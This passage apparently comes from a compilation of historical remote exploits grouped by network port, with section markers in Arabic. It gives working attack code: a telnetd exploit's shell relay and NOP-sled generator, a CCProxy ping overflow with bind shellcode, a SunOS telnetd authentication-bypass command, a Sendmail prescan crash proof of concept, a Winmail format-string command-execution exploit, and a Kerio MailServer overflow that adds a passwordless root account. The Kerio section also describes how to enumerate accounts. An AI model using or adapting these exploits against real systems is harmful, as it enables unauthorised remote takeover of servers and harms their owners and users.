buf[n++] = TELOPT_NAOL; /* 0x08 */
buf[n++] = IAC; /* 0xff */
buf[n++] = WILL; /* 0xfb */
buf[n++] = TELOPT_ENCRYPT; /* 0x26 */
#ifdef DEBUG
hexdump ("check send buffer", buf, n);
#endif
if (send (fd, buf, n, 0) != n) {
perror ("xp_check:send");
exit (EXIT_FAILURE);
}
n = read (fd, buf, sizeof (buf));
#ifdef DEBUG
hexdump ("check recv buffer", buf, n);
#endif
if (memcmp (buf, expected, expect_len) == 0) {
if (memcmp (buf+expect_len, additional, additional_len) == 0) {
mode = 16;
} else {
mode = 34;
bs = bs34;
}
printf ("check: PASSED, using %dmb mode\n", mode);
return (1);
}
printf ("check: FAILED\n");
return (0);
}
void
shell (int sock)
{
int l;
char buf[512];
fd_set rfds;
while (1) {
FD_SET (0, &rfds);
FD_SET (sock, &rfds);
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
perror ("read user");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}
if (FD_ISSET (sock, &rfds)) {
l = read (sock, buf, sizeof (buf));
if (l <= 0) {
perror ("read remote");
exit (EXIT_FAILURE);
}
write (1, buf, l);
}
}
}
/* ripped from zodiac */
void
hexdump (char *desc, unsigned char *data, unsigned int amount)
{
unsigned int dp, p; /* data pointer */
const char trans[] =
"................................ !\"#$%&'()*+,-./0123456789"
":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
"nopqrstuvwxyz{|}~................................. ..."
".................................................. ..."
"........................................";
printf ("/* %s, %u bytes */\n", desc, amount);
for (dp = 1; dp <= amount; dp++) {
fprintf (stderr, "%02x ", data[dp-1]);
if ((dp % 8) == 0)
fprintf (stderr, " ");
if ((dp % 16) == 0) {
fprintf (stderr, "| ");
p = dp;
for (dp -= 16; dp < p; dp++)
fprintf (stderr, "%c", trans[data[dp]]);
fflush (stderr);
fprintf (stderr, "\n");
}
fflush (stderr);
}
if ((amount % 16) != 0) {
p = dp = 16 - (amount % 16);
for (dp = p; dp > 0; dp--) {
fprintf (stderr, " ");
if (((dp % 8) == 0) && (p != 8))
fprintf (stderr, " ");
fflush (stderr);
}
fprintf (stderr, " | ");
for (dp = (amount - (16 - p)); dp < amount; dp++)
fprintf (stderr, "%c", trans[data[dp]]);
fflush (stderr);
}
fprintf (stderr, "\n");
return;
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i == -1) {
he = gethostbyname(host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n,
len,
error,
flags;
int fd;
struct timeval tv;
fd_set rset, wset;
struct sockaddr_in csa;
if (cs == NULL)
cs = &csa;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
if (!(cs->sin_addr.s_addr = net_resolve (server))) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
/* imported from shellkit */
unsigned long int
random_get (unsigned long int low, unsigned long int high)
{
unsigned long int val;
if (low > high) {
low ^= high;
high ^= low;
low ^= high;
}
val = (unsigned long int) random ();
val %= (high - low);
val += low;
return (val);
}
void
random_init (void)
{
srandom (time (NULL));
}
int
bad (unsigned char u)
{
if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
return (1);
return (0);
}
int
badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len)
{
int n;
for (code_len -= 1 ; code_len >= 0 ; --code_len) {
for (n = 0 ; n < bad_len ; ++n)
if (code[code_len] == bad[n])
return (1);
}
return (0);
}
unsigned long int
x86_nop_rwreg (void)
{
unsigned long int reg;
do {
reg = random_get (0, 7);
} while (reg == 4); /* 4 = $esp */
return (reg);
}
unsigned long int
x86_nop_xfer (char *xferstr)
{
int bw = 0; /* bitfield walker */
unsigned char tgt; /* resulting instruction */
/* in a valid xferstr we trust */
for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) {
switch (xferstr[0]) {
case ('0'):
BSET (tgt, 1, 0, bw);
break;
case ('1'):
BSET (tgt, 1, 1, bw);
break;
case ('r'):
BSET (tgt, 3, x86_nop_rwreg (), bw);
break;
case ('.'):
break; /* ignore */
default:
fprintf (stderr, "on steroids, huh?\n");
exit (EXIT_FAILURE);
break;
}
}
if (bw != 8) {
fprintf (stderr, "invalid bitwalker: bw = %d\n", bw);
exit (EXIT_FAILURE);
}
return (tgt);
}
unsigned int
x86_nop (unsigned char *dest, unsigned int dest_len,
unsigned char *bad, int bad_len)
{
int walk;
int bcount; /* bad counter */
char * xs;
char * xferstr[] = {
"0011.0111", /* aaa */
"0011.1111", /* aas */
"1001.1000", /* cbw */
"1001.1001", /* cdq */
"1111.1000", /* clc */
"1111.1100", /* cld */
"1111.0101", /* cmc */
"0010.0111", /* daa */
"0010.1111", /* das */
"0100.1r", /* dec <reg> */
"0100.0r", /* inc <reg> */
"1001.1111", /* lahf */
"1001.0000", /* nop */
"1111.1001", /* stc */
"1111.1101", /* std */
"1001.0r", /* xchg al, <reg> */
NULL,
};
unsigned char tgt;
for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) {
/* avoid endless loops on excessive badlisting */
for (bcount = 0 ; bcount < 16384 ; ++bcount) {
xs = xferstr[random_get (0, 15)];
tgt = x86_nop_xfer (xs);
dest[walk] = tgt;
if (badstr (&dest[walk], 1, bad, bad_len) == 0)
break;
}
/* should not happen */
if (bcount >= 16384) {
fprintf (stderr, "too much blacklisting, giving up...\n");
exit (EXIT_FAILURE);
}
}
return (walk);
}
// [2001-06-09]
23 CCProxy 6.2 (ping) Remote Buffer Overflow Exploit
################################################## ####################
## |------------------------------------------------------------| ##
## | CCProxy 6.2 ping Remote Buffer Overflow Exploit | ##
## | Based on Ruder's discovery,exploit by KaGra | ##
## | Binds Shellcode aT 101,use netcat to connect back... | ##
## | Tested in WinXP SP1 EnGlish | ##
## | Greedingz to:NinA,Coderz.gr and my musik BanD | ##
## |------------------------------------------------------------| ##
################################################## ####################
# Usage:exploit.py|nc Host port,where port is the telnet service of the target
# The buG exists when a long parameter is passed to ping command in telnet
# service of CCproxy server.This is a classic stack based overflow.Ret address
# is close to ESI,so a JMP ESI will do the trick.Other nops are just for padding...
#
#
#C:\exploit.py|nc localhost 23
#
#C:\nc -v localhost 101
#
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\xcv>
import struct
#BinD ShellCode aT PorT 101,taken from muts exploit,thankz pul...
sc2 = "\xEB"
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += "\x58\x68\x61\x63\x6B\x90"
buffer = '\x90'*605 # The usual nops...
RETADDR="\xc7\x41\xe6\x77" # JMP ESI In XP SP1 EnGliSH...
buff2='\x90'*8 # padding...
print "ping "+buffer+sc2+RETADDR+buff2 # DeaD...
// [2004-11-10]
23 SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION******************** ************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################## ##############
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]"
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1
# [2007-02-11]
####################################
انتهينا من البورت 23
###################################
نبداء بـ بورت 25
25 Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit
/*
* Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit by bysin
*
* This is to prove that the bug in sendmail 8.12.8 and below is vulnerable.
* On sucessful POC exploitation the program should crash with the following:
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x5c5c5c5c in ?? ()
*
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
int maxarch=1;
struct arch {
char *os; // The OS
int pos; // The position of ebp in the stack, with the last byte being 0x00
int apos; // The amount of bytes after pvpbuf where ebp is located
unsigned long addr; // The pointer to the addr buffer
} archs[] = {
{"FreeBSD 4.7-RELEASE",180,28,0xbfbfdad1},
};
/////////////////////////////////////////////////////////
#define BUFSIZE 50096
void header() {
printf("Sendmail 8.12.8 prescan() exploit by bysin\n\n");
}
void printtargets() {
unsigned long i;
header();
printf("\t Target\t Addr\t\t OS\n");
printf("\t-------------------------------------------\n");
for (i=0;i<maxarch;i++) printf("\t* %d\t\t 0x%08x\t %s\n",i,archs[i].addr,archs[i].os);
printf("\n");
}
void printresponse(char *a) {
printf("%s\n",a);
}
void writesocket(int sock, char *buf) {
if (send(sock,buf,strlen(buf),0) <= 0) {
printf("Error writing to socket\n");
exit(0);
}
printresponse(buf);
}
void readsocket(int sock, int response) {
char temp[BUFSIZE];
memset(temp,0,sizeof(temp));
if (recv(sock,temp,sizeof(temp),0) <= 0) {
printf("Error reading from socket\n");
exit(0);
}
if (response != atol(temp)) {
printf("Bad response: %s\n",temp);
exit(0);
}
else printresponse(temp);
}
void relay(int sock) {
while(1) {
char temp[BUFSIZE];
memset(temp,0,sizeof(temp));
if (recv(sock,temp,sizeof(temp),0) <= 0) {
printf("Server vulnerable (crashed)\n");
exit(0);
}
printresponse(temp);
if (atol(temp) == 553) {
printf("Not exploitable\n");
exit(0);
}
}
}
int main(int argc, char **argv) {
struct sockaddr_in server;
unsigned long ipaddr,i,j,m;
int sock,target;
char tmp[BUFSIZE],buf[BUFSIZE],*p,*pos=NULL;
if (argc <= 2) {
printf("%s <target ip> <target number>\n",argv[0]);
printtargets();
return 0;
}
target=atol(argv[2]);
if (target < 0 || target >= maxarch) {
printtargets();
return 0;
}
header();
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Unable to create socket\n");
exit(0);
}
server.sin_family = AF_INET;
server.sin_port = htons(25);
printf("Resolving address... ");
fflush(stdout);
if ((ipaddr = inet_addr(argv[1])) == -1) {
struct hostent *hostm;
if ((hostm=gethostbyname(argv[1])) == NULL) {
printf("Unable to resolve address\n");
exit(0);
}
memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
}
else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
printf("Address found\n");
printf("Connecting... ");
fflush(stdout);
if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
printf("Unable to connect\n");
exit(0);
}
printf("Connected\n");
printf("Sending exploit... \n");
fflush(stdout);
readsocket(sock,220);
writesocket(sock,"HELO yahoo.com\r\n");
readsocket(sock,250);
writesocket(sock,"MAIL FROM: <[email protected]>\r\n");
readsocket(sock,250);
memset(buf,0,sizeof(buf));
strcpy(buf,"RCPT TO: ");
p=buf+strlen(buf);
for (i=1,j=0,m=0;i<1242;i++) {
if (!(i%256)) {
*p++=';';
j++;
}
else {
if (j < 4) *p++='A';
else {
if (m == archs[target].pos) pos=p;
//if (m > archs[target].pos) *p++='B'; else
*p++='A';
m++;
}
}
}
if (pos) memcpy(pos,(char*)&archs[target].addr,4);
*p++=';';
for (i=0;i<archs[target].apos;i++) {
*p++='\\';
*p++=0xff;
}
strcat(buf,"\r\n");
writesocket(sock,buf);
relay(sock);
}
// [2003-04-30]
25 Winmail Mail Server 2.3 Remote Format String Exploit
/************************************************** ****************
* Magic Winmail Server 2.3(Build 0402)
* Remote Format string exploit.
************************************************** ****************
* Coded by ThreaT.
*
*
* This one take advantage of a format bug in the
* >>> SMTP protocol <<< (not pop3) for execute
* a malicious command on a vulnerable system
*
* usage : mwmxploit <Target IP> <command to execute remotely> [smtp port]
* + The command to execute cannot exceed 90 characters +
*
* compile : cl.exe mwmxploit.c /w
*
************************************************** ****************
*/
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")
void main (int argc, char *argv[])
{
SOCKET sock;
char buffer[1000];
int i;
// ecrasement d'un saved EIP grâce aux caractères de format
char vuln[] =
"\xec\xfc\x66\x01%x%x"
"\xed\xfc\x66\x01%x%x"
"\xee\xfc\x66\x01"
"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%28x%n"
"%97x%n%105x%hn"
/*
This is my specific shellcode for execute a command
over the Magic Winmail process.
This one can contain null bytes, enjoy ! :)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Disassembly of File: mailserver.exe
Code Offset = 00001000, Code Size = 000CF000
Data Offset = 000EC000, Data Size = 0002E000
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Reference To: KERNEL32.GetModuleHandleA, Ord:0000h
:004B8850 FF15AC014D00 Call dword ptr [004D01AC]
Reference To: KERNEL32.ExitProcess, Ord:0000h
:004B88C6 FF1598014D00 Call dword ptr [004D0198]
Reference To: KERNEL32.GetProcAddress, Ord:0000h
:00406CE7 8B3DEC004D00 mov edi, dword ptr [004D00EC]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
//////////////////////// My shellcode \\\\\\\\\\\\\\\\\\\\\\\\\\
: EB50 jmp 00401058
: 5E pop esi
: 8BEC mov ebp, esp
: 83EC28 sub esp, 00000028 // je cree un stack
: C745D84B65726E mov [ebp-28], 6E72654B
: C745DC656C3332 mov [ebp-24], 32336C65 // j'y place 'Kernel32'
: C745E000000000 mov [ebp-20], 00000000
: C745E457696E45 mov [ebp-1C], 456E6957
: C745E878656300 mov [ebp-18], 00636578 // ici 'WinExec'
// adaptez le shellcode en virant cette ligne si vraiment vous avez besoin
// de 4 caractères de plus pour la commande à executer
: C645EB00 mov [ebp-15], 00
: BAAC014D00 mov edx, 004D01AC
: 8D45D8 lea eax, dword ptr [ebp-28]
: 50 push eax
: FF12 call dword ptr [edx] // eax = GetModuleHandle ("Kernel32");
: 8D5DE4 lea ebx, dword ptr [ebp-1C]
: 53 push ebx
: 50 push eax
: BAEC004D00 mov edx, 004D00EC
: FF12 call dword ptr [edx] // GetProcAdress (eax, "WinExec");
: 6A01 push 00000001 // 1 = SW_SHOW, 0 = SW_HIDE
: 56 push esi
: FFD0 call eax // WinExec (argv[2], SW_SHOW)
: BA98014D00 mov edx, 004D0198
: FF12 call dword ptr [edx] // ExitProcess ();
: E8ABFFFFFF call 00401008
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ EOF /////////////////////////////////
*/
// Generated by Hex Workshop
// shellcode.exe - Starting Offset: 4102 (0x00001006) Length: 87 (0x00000057)
"\x00\x90\x90\x90\x90" // sa, c'est pour bien coller
"\xEB\x50\x5E\x8B\xEC\x83\xEC\x28\xC7\x45\xD8\x4B\x 65\x72\x6E\xC7"
"\x45\xDC\x65\x6C\x33\x32\xC7\x45\xE0\x00\x00\x00\x 00\xC7\x45\xE4"
"\x57\x69\x6E\x45\xC7\x45\xE8\x78\x65\x63\x00\xC6\x 45\xEB\x00\xBA"
"\xAC\x01\x4D\x00\x8D\x45\xD8\x50\xFF\x12\x8D\x5D\x E4\x53\x50\xBA"
"\xEC\x00\x4D\x00\xFF\x12\x6A\x01\x56\xFF\xD0\xBA\x 98\x01\x4D\x00"
"\xFF\x12\xE8\xAB\xFF\xFF\xFF";
SOCKADDR_IN sin;
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);
//
printf ("* #################################### *\n"
" Magic Winmail Server 2.3(Build 0402)\n"
" Remote format string exploit !\n"
"* #################################### *\n"
" Coded By ThreaT -> ThreaT\n\n");
if (argc < 3 || strlen (argv[2]) > 90)
{
printf ("usage : mwmxploit <Target IP> <command to execute> [smtp port]\n\n"
" + The command to execute cannot exceed 90 characters +\n");
ExitProcess (0);
}
if ( WSAStartup(wVersionRequested, &wsadata) )
{
printf ("Erreur d'initialisation winsock !\n");
ExitProcess (1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons ((void *)argv[3] ? atoi (argv[3]) : 25);
if ( (sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Erreur : L'adresse IP de la victime est incorrect !\n");
ExitProcess (2);
}
printf ("connecting to %s on port %u...", argv[1], ntohs ( sin.sin_port ) );
sock = socket (AF_INET, SOCK_STREAM, 0);
if ( connect (sock, (SOCKADDR *)&sin, sizeof (sin)) )
{
printf ("erreur : connexion impossible !\n");
ExitProcess (3);
}
recv (sock,buffer,1000,0);
printf ("ok\n-> %s\nsending exploit code...",buffer);
send (sock, vuln, strlen (vuln) + 92, 0); // envoi du shellcode
send (sock, argv[2], strlen (argv[2]), 0); // envoi de la commande
send (sock, "\r\n", 2, 0); // validation
recv (sock,buffer,1000,0); // remote crash :)
puts ("ok");
}
/*
D:\toolz\netcat>nc 127.0.0.1 25
220 M1 Magic Winmail Server 2.3(Build 0402) ESMTP ready
AAAA 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.
8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
502 unimplemented (#5.5.1)
*/
/*
D:\>type "c:\Program Files\Magic Winmail\server\logs\smtp.log"
0906/Y-01:50:30 1548 Connect from 127.0.0.1
0906/Y-01:51:06 1584 unrecognized command = AAAA 0x00498f71 0x0176fd10
0x0176fe3c 0x000000eb 0x0176ff80 0x00ee6c80 0x00000050 0x00ee60d9 0x00000102
0x0000011f 0x00000050 0x00eecf71 0x0000001c 0x0000001f 0x0176ff74 0x004cd2c0
0x00000001 0x00493e40 0x0176fd50 0x00000000 0x00ee5ea8 0x00ee5ea8 0x41414141
0x25783020 0x2078382e 0x2e257830 0x30207838 0x382e2578 0x78302078 0x78382e25
0x25783020 0x2078382e 0x2e257830
*/
// [2003-06-11]
25 Kerio MailServer 5.6.3 Remote Buffer Overflow Exploit
/* Remote Buffer Overflow Exploit for Kerio MailServer 5.6.3 */
/* ========================================= */
/* By B-r00t */
/* */
/* In response to the Kerio Mailserver vulnerabilities */
/* discovered by David F.Madrid. */
/* */
/* Although this exploit requires valid authentication */
/* details, it is possible to use 'RCPT TO' to enumerate */
/* valid accounts 'A La Sendmail' as shown below: - */
/*
$ telnet 192.168.0.10 25
Trying 192.168.0.10...
Connected to 192.168.0.10.
Escape character is '^]'.
220 dhcp-185-45 Kerio MailServer 5.6.3 ESMTP ready
mail from: [email protected]
250 2.1.0 Sender <[email protected]> ok
rcpt to: [email protected]
550 5.1.1 Mailbox <[email protected]> does not exist
rcpt to:[email protected]
250 2.1.5 Recipient <[email protected]> ok (local) << default
admin account.
rcpt to: [email protected]
250 2.1.5 Recipient <[email protected]> ok (local) << user fred
seems to exist.
rset
250 2.0.0 Reset state
quit
221 2.0.0 SMTP closing connection
Connection closed by foreign host.
*/
/* Using a dictionary attack to obtain a large number */
/* of accounts in conjunction with users natural */
/* stupidity for using easy to guess passwords should */
/* yield at least one valid account. */
/* */
/* Once an account has been cracked, login to the */
/* Kerio webmail service and record the 'userid' */
/* cookie value: - */
/*
$ lynx 192.168.0.10
Username: fred___________
Password: _______________
OK
192.168.0.10 cookie: userid=7dc1700017e708a5 Allow? (Y/N/Always/neVer)
*/
/* Accept the cookie 'Y' to ensure you are fully */
/* logged in to the Kerio webmail service. */
/*
[br00t@silvia:~] $ ./keriobaby 192.168.0.10 userid=7dc1700017e708a5
Payload: 408 / 408 bytes
Wall0p! ... !!!
If successful a UID 0 Account 'keriohacker'
has been appended to /etc/passwd. Use 'ssh'
or 'su' (if local) to get r00t! ....
[br00t@silvia:~] $ ssh -l keriohacker 192.168.0.10
Last login: Thu Jun 5 08:21:30 2003
sh-2.05# id
uid=0(root) gid=0(root) groups=0(root)
sh-2.05# tail -1 /etc/passwd
keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh
sh-2.05#
*SSH assumes: PermitRootLogin yes & PermitEmptyPasswords yes
Alternative: Recode the shellcode to add normal user!
That's All Folks ...
ENJOY!
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define DEST_PORT 80
int main ( int argc, char *argv[] )
{
int socketfd, bytes;
struct sockaddr_in dest_addr;
char buffer[700];
// char ret[] = "\x07\xf7\x7f\xbe"; // Use this if attached with GDB
char ret[] = "\x07\xf7\xff\xbe"; // RedHat Linux 7.2 +
kerio-mailserver-mcafee-5.6.3-rh7.i386.rpm
char *ptr = buffer;
char req[] = "GET /list?folder=~";
char cr[] = "\x0D\x0A";
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
// Fat Bloke Shellcode to avoid HTTP chars by B-r00t..
// Appends: keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh
"\xeb\x55\x5e\xb0\xff\x2c\xd0\x88\x06\x88\x46\x04\x 88\x46\x34"
"\x88\x46\x39\x88\x46\x3d\x31\xc0\x88\x46\x0b\x88\x 46\x41\x66"
"\xb8\x0b\x27\x66\x2d\x01\x27\x66\x89\x46\x40\x8d\x 5e\x0c\x89"
"\x5e\x42\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66\xba\x e4\x01\xcd"
"\x80\x89\xc3\xb0\x04\x8b\x4e\x42\x31\xd2\xb2\xff\x 80\xea\xca"
"\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\x e8\xa6\xff"
"\xff\xff\x58\x65\x74\x63\x58\x70\x61\x73\x73\x77\x 64\x58\x6b"
"\x65\x72\x69\x6f\x68\x61\x63\x6b\x65\x72\x3a\x3a\x 30\x3a\x30"
"\x3a\x42\x2d\x72\x30\x30\x74\x7e\x52\x30\x78\x7e\x 59\x33\x72"
"\x7e\x57\x30\x72\x6c\x64\x21\x2e\x3a\x58\x74\x6d\x 70\x3a\x58"
"\x62\x69\x6e\x58\x73\x68\x58\x58\x41\x41\x41\x41"
"\x90\x90\x90\x90\x90\x90";
memset (buffer, '\0', sizeof (buffer));
if (argc < 3) {
printf("\nUsage: %s [IP_ADDRESS] [COOKIE]", argv[0]);
printf("\nExample: %s 10.0.0.1 userid=771c740df0270936\n",
argv[0]);
exit (1);
}
printf ("\nPayload: %d / 408 bytes\n\n", strlen(shellcode));
strcpy (buffer, req);
strcat (buffer, shellcode);
strcat (buffer, ret);
strcat (buffer, ret);
strcat (buffer, " HTTP/1.0");
strcat (buffer, cr);
strcat (buffer, "Cookie: ");
strcat (buffer, argv[2]);
strcat (buffer, cr);
strcat (buffer, cr);
if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("Socket");
exit (1);
}
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
perror("inet_aton problems");
exit (2);
}
memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct
sockaddr)) == -1){
perror("connect failed");
close (socketfd);
exit (3);
}
bytes = (send (socketfd, ptr, strlen(buffer), 0));
if (bytes == -1) {
perror("send error");
close (socketfd);
exit(4);
}
close (socketfd);
printf ("\nWall0p! ... !!!\n\n");
